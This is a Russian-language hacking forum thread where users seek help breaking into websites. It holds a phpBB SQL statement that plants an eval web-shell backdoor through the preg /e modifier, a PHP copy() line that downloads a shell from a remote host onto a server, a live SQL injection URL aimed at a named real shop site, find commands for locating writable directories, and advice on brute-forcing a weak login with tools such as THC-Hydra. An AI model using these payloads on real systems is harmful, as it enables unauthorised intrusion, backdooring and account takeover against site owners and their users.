тема такая есть веб форма логин пас капчи нету пробил вручную нету все нормально пас из 4х символов другими словами можно сбрутить легко акаунт , вопрос каким софтом ето можно сделать? что актуальное посоветуете ...

Ребят мне как сделать так что бы шелл залился нормальный человеческий я имею доступ к админке пхпбб форум

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;

че тут поменять и на что ? что бы был шелл всо??? ненадо умничать)

BrutusA2

скачал AET2

сайт начинается с https://тутпоставилИПсайта вставил в форму программы сделал пасы и логин , но чет не работает так как надо , капчи нету , что не так ?

поставил на перебор на TYPE HTTP (Form)

что не так сделал ?

там нету протокола https

Ты помоему спешишь куда-то постоянно

В этом тоже есть:

http://la2-shop.ru/categories.php?id_cat=-3'+union+select+version()--+

А можно узнать зачем использовать $_REQUEST если " уж так надо $_GET оставить" ? )

Или это какой то приватный метод, онли закрытые группы?

satana8920: из-за кавычек ошибки не будет. У тебя там stripslashes стоит для этого.

phpinfo вообще выводит? И что там стоит в урлфайлопен, если да

пхпинфо вывод отлично allow_url_fopen On стоит блин ребят дайте код рабочий для заливки шелла плс

copy('http://сайт с шеллом/shell.txt','./путь/на сервере/в папку с правами на запись/shell.php');

Copy() будет ограничена при safe_mode=on.

Лучше move_uploaded_file().

С командной строки можна найти так найти вритабельные директории\файлы(файлы дописать!):

find . -type d -perm 777 -print

find . -type f -perm 777 –print

Если системную команду не выполнить в php есть функция = is_writable(), через нее можна поискать вритабельные.

THC-Hydra работает с https. А вообще в гугле много инструментов.